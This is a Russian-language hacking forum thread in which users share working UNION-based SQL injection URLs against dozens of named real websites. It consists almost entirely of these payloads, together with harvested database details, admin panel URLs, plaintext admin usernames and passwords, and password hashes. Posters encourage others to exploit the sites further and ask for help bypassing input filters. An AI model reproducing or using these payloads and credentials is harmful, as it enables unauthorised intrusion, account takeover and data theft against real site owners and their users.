SQL Инъекции

www.kochfeuer.de
Softbiz Link Directory Script

 

HTML:

http://www.algi.hdwao.pl/comment.php?what=article&id=12+UNION+SELECT+1,2,pass,4,admin,6,nick,icq,9+from+algi_users/*

HTML:

http://www.algi.hdwao.pl/comment.php?what=article&id=12+UNION+SELECT+1,2,pass,4,5,6,nick,icq,9+from+poezje_users/*

БД 5

 

dinaitour.com - туризм в Украине
4.1.20dinaitourdinaitour@localhost

Code:

http://www.dinaitour.com/tourism/tour/ukraine/?tour=3&sub=-1+union+select+1,concat_ws(0x05,version(),database(),user()),3,4/*

 

nadejda.com.ua - агенство недвижимости
5.0.45-lognadejda_nadejdanadejda_unadejda@localhost

Code:

http://www.nadejda.com.ua/index.php?page=list&prm=sale&x=&city=-1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x05,version(),database(),user()),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
http://www.nadejda.com.ua/index.php?page=list&prm=sale&x=&city=-1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x05,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+information_schema.columns/*

cities
constypes
flattypes
main
maps
objects
typetypes

 

pizzamarketplace.com - Pizza Marketplace
4.0.27-standardsitedbatmmarketplace@localhost

Code:

http://www.pizzamarketplace.com/research.php?rc_id=-1+union+select+concat_ws(0x05,version(),database(),user()),2,3,4,5,6,7,8,9/*

Проголодались?

 

Серия сайтов сделаных студией Granite5

Серия сайтов сделаных студией Granite5

4.1.10a-standard-logcenturycareadmin@localhost

Code:

http://www.21centurycare.co.uk/vacancydetails.php?id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),2,3,4/*

4.1.10a-standard-logallNationsCollegeadmin@localhost

Code:

http://www.allnations.ac.uk/newsevent.php?newseventid=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*&section=Home

4.1.10a-standard-logblueoceanadmin@localhost

Code:

http://www.blueoceanpublishing.biz/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*

4.1.10a-standard-logbmladmin@localhost

Code:

http://www.bmlbss.com/news_article.php?id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),2,3,4,5,6/*

4.1.10a-standard-logbournadmin@localhost

Code:

http://www.bournschool.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*

4.1.10a-standard-logdruidsadmin@localhost

Code:

http://www.boxtreebar.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

4.1.10a-standard-logbremedadmin@localhost

Code:

http://www.bremed.co.uk/shop.php?shopcatid=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),5,6,7,8,9,10,11,12,13,14,15,16/*

4.1.10a-standard-logbullyingmattersadmin@localhost

Code:

http://www.bullyingmatters.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*

4.1.10a-standard-logbosadmin@localhost

Code:

http://www.businessofficesupplies.co.uk/news_story.php?id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),2/*

4.1.10a-standard-logcambridgeblueadmin@localhost

Code:

http://www.cambridgeblue.biz/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*

4.1.10a-standard-loggeniusTemplateadmin@localhost

Code:

http://www.caro.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*

4.1.10a-standard-logfelthamsadmin@localhost

Code:

http://www.cplfelthams.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*

4.1.10a-standard-logchairs4childrenadmin@localhost

Code:

http://www.chairs4children.com/article.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),3,4,5,6,7,8/*

4.1.10a-standard-loggeniusTemplateadmin@localhost

Code:

http://www.cliffordburr.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*

4.1.10a-standard-loggeniusTemplateadmin@localhost

Code:

http://www.country-toys.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*

4.1.10a-standard-logcranfieldeg2admin@localhost

Code:

http://www.cranfieldelectrical.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*

4.1.10a-standard-loggeniusTemplateadmin@localhost

Code:

http://www.crownhillgarden.com/index.php?pageid=-1+union+select+1,2,3,4,5,6,7,8,9,10,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*

4.1.10a-standard-logcrowoodadmin@localhost

Code:

http://www.crowood.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*

4.1.10a-standard-loggeniusTemplateadmin@localhost

Code:

http://www.crtsolutions.co.uk/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*

4.1.10a-standard-logwichitaadmin@localhost

Code:

http://www.wichita.co.uk/productdetails.php?id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),2,3,4/*

Cambridge University Rugby Club
4.1.10a-standard-logcurufcadmin@localhost

Code:

http://www.curufc.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,version(),database(),user()),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*

P.S.: Кстати, это далеко не полный список сайтов... Почти половина!

 

Code:

http://www.colorprint.ru/index.php?id=-37+union+select+concat_ws(0x2F,version(),user(),database()),2,3,4,5,6,7/*

4.0.26/[email protected]/colorprintru

 

HTML:

http://www.greenshift.com/news.php?id=-97+UNION+SELECT+1,user,password,4,5,6,7,8,9,10,11,12+from+mysql.user/*

 

А вот еще одни нубы )) надо ж так у админа пасс 1234 был :
http://www.apollo-tour.ru/

admin:1234
админка как обычно : http://www.apollo-tour.ru/admin/index.php

 

Прошу прощения за рекламу =\ сразу неподумал

 

Code:

http://michaelyoun.com/index.php?id=335+union+select+1,concat(login,0x7c,pass),3,4,5,concat_ws(0x2F,version(),user(),database())+from+users+limit+3,3//*

Version : 4.0.17-standard/[email protected]/michael132576

login | Password

Julien | $hAiaSOWw$L.ElrCaZddSXNbczXLln..

neel | $NT1HKLs6$maKjAm5gOFUdNwVnPKDed0

david | $CkfkJS1m$R0Wm0U9U.SewH1gZPqYOS.

marcoa | $zRtxrrzF$x9QdtdsEoDw47todoerT30

DavidHill | $/jrBGNbU$lneMqAV.Nwsk8bYXxsqLb.

Pascal | $tUYKyzOrNMdHIM2AsIYpf9ZnvgYc0

francoisadmin | $GaZJk4Aq$lGLp3Qc7ah45PioM9Mknl/

aroustan | $WXSFA3Ry$H2sDLkEXsCKHpXYIO9hnV/

jcharron | {left}NGNegUI$o4Uub83kCAKzLHetW7UBp.

roussot | $K1e9J0lz$A8trNdKNnQQwyrsNIJy7N.

 

Так удали...тут скрины не надо выставлять...если каждый будет скрин кидать хрен пойми что получится.

HTML:

http://www.thaitrademe.com/classifieds/product_desc.php?id=-4871+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*

БД 5

HTML:

http://www.classifiedbiz.com/product_desc.php?id=4635+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*

4 бд

HTML:

http://sigpig.com/product_desc.php?id=-139+UNION+SELECT+1,2,concat(admin_name,0x3b,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+sbauctions_admin/*

HTML:

http://sigpig.com/product_desc.php?id=-139+UNION+SELECT+1,2,concat(username,0x3b,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+sbauctions_members/*

БД 5

 

Code:

http://ukrfoto.dp.ua/download.php?id=-166+union+select+1,concat_ws(0x2F,user(),version(),database()),3,4,5,6/*

ukrfoto@saturn/4.1.22-log/ukrfoto 3

 

Code:

http://www.heroesworld.ru/files.php?section=9999999'+union+select+1,concat_ws(0x2F,user(),version()%20%20,database())/*

heroesv_bdu@localhost/4.1.20/heroesv_main
Работает только с 9999999.

 

Агентство недвижимости «ИНСАЙД НОРД ВЕСТ»

Code:

http://www.i-nw.ru/news.php?id=9999+union+select+1,version(),3,4,concat(login,char(58),password),6,7+from+users/*

Version 4.1.20-log/[email protected]/db_insidenw_1

Admins

secretar:123
luoman:12345
fin:f2inw

 

Code:

http://www.roguegovernment.com/news.php?id=-4682+union+select+1,version(),aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x3a),0x3a),4,5,6+from+mysql.user/*

Version root@localhost/4.1.7/roguegovernment

Admins:

root:6aee13f5467031e6

 

Code:

http://www.pro-tour.ru/news.php?id=772+union+select+1,concat_ws(0x2F,user(),version(),database()),3,4,5,6,7/*

protour@19
----------------------------------------------------------------------------------------------------------

Code:

http://www.clarionrus.ru/news.php?id=-51+union+select+1,2,3,concat_ws(0x2F,version(),user(),database()),5,6/*

4.1.20-lk-log/clarionrus@localhost/clarionrus

 

triennale.it

Code:

http://www.triennale.it/index.php?lang=_eng&id=1&tbl=0&idq=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,version(),database(),user()),43,44,45,46,47,48,49,50/*

55 таблиц:

Code:

http://www.triennale.it/index.php?id=1&tbl=0&idq=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,table_name,43,44,45,46,47,48,49,50+from+information_schema.tables+limit+54,1/*

Насколько я понял, таблица админов - utenti_gestionale:

Code:

http://www.triennale.it/index.php?id=1&tbl=0&idq=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,id_utente,password),43,44,45,46,47,48,49,50+from+utenti_gestionale+limit+0,1/*

Её поля:

Code:

id_utente
password
grado

Админов трое "логин:пасс":

Code:

triennale:Triennale_6
biglietteria:TrMilano
biglietteriaTBVS:TBVS_

На сайте есть SHOP, кому интересно - ковыряйте дальше (я с итальянским как-то не дружу!).

 

Code:

http://www.getsalt.com/news.php?id=-117+union+select+1,2,concat_ws(0x2F,version(),user(),database()),4,5,6,concat_ws(char(58,58),username,password,id),8,9,10,11,12+from+fb_users+limit+3,3/*

Данные : 5.0.22-log/getsalt@localhost/getsalt

Admins:
Login Password ID

Anneleen test123 2
kikivreeling vre27kik 19

 

Вопрос!
Сайт atdr.ro :

Code:

http://atdr.ro/index.php?id=-1/**/union/**/select/**/1,2,version(),4,5,6,7,8,9,10,11/*

Фильтрацию "+" обошёл, а вот concat никак не могу
Как обойти?
И ещё: при подборе таблиц странная реакция на запрос поля user_password из mysql.user
Кто копнёт глубже - отпишитесь (+)!